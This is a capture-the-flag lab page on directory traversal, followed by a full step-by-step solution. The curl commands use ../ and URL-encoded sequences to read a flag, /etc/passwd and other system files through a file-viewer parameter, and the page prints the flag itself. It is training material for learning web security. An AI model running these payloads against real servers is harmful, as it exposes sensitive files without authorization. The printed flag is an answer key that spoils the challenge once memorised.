Labs / Simple Directory Traversal
- Challenge
- Released 29 Sep 2025
📁 Can you escape the directory and access restricted files?
This simple file viewer uses direct string concatenation to build file paths, creating the perfect opportunity for directory traversal attacks. 📁 Directory traversal is a fundamental web vulnerability that allows attackers to access files outside the intended directory, potentially exposing sensitive system files and configuration data. The application trusts user input without validation - a classic mistake that opens the door to file system exploitation! 🎯
Start Lab Environment
📁 Simple Directory Traversal - Complete Solution
🔍 Step 1: Application Discovery
Access the web application and explore its functionality:
curl -s http:/// The application is a "Simple File Viewer" that allows users to view text files. It shows available files: readme.txt, sample.txt, and info.txt.
🔍 Step 2: Normal File Viewing
Test the normal file viewing functionality:
curl -s "http:///view?file=readme.txt" The application displays the file contents and shows the file path as "files/readme.txt", revealing how the path is constructed.
🔍 Step 3: Path Analysis
Examine how the file parameter is processed:
curl -s "http:///view?file=sample.txt" The response shows "File Path: files/sample.txt", indicating direct string concatenation without validation.
🔍 Step 4: Directory Traversal Testing
Test for directory traversal using ../ sequences:
curl -s "http:///view?file=../flag.txt" This attempts to access a file one directory level up from the files directory.
🔍 Step 5: Flag Extraction
Successfully retrieve the flag using directory traversal:
# Extract the flag
curl -s "http:///view?file=../flag.txt" | grep -o '[0-9a-f]\{8\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{4\}-[0-9a-f]\{12\}' The flag is revealed: cddc6bda-3d66-48e7-9848-6672afc2a5c8
🔍 Step 6: System File Access
Demonstrate accessing system files to show the full impact:
# Access system passwd file
curl -s "http:///view?file=../../etc/passwd" This shows how directory traversal can be used to access sensitive system files.
🔍 Step 7: Multiple Traversal Levels
Test multiple directory levels to understand the file system structure:
# Try different traversal depths
curl -s "http:///view?file=../../../etc/hosts"
curl -s "http:///view?file=../../../../proc/version" This demonstrates how multiple ../ sequences can traverse deeper into the file system.
🔍 Step 8: URL Encoding Bypass
Test URL encoding to bypass potential filters:
# URL-encoded directory traversal
curl -s "http:///view?file=%2e%2e%2fflag.txt" This shows how URL encoding (%2e%2e%2f for ../) can bypass basic input filters.
🔍 Step 9: Path Information Disclosure
Observe how the application reveals the actual file paths:
curl -s "http:///view?file=../flag.txt" | grep "File Path:" The response shows "File Path: files/../flag.txt", confirming the path construction method.
🔍 Step 10: Vulnerability Confirmation
Confirm the directory traversal vulnerability allows arbitrary file access:
# Verify the vulnerability
curl -s "http:///view?file=../flag.txt" | grep "SYSTEM FLAG" This confirms successful exploitation of the directory traversal vulnerability.
🛡️ Security Implications
This challenge demonstrates a real directory traversal vulnerability where ../ sequences allow attackers to access files outside the intended directory. The vulnerability occurs because user input is directly concatenated into file paths without proper validation or sanitization. This can lead to unauthorized file access, information disclosure, and potential system compromise - making it a critical security vulnerability in web applications.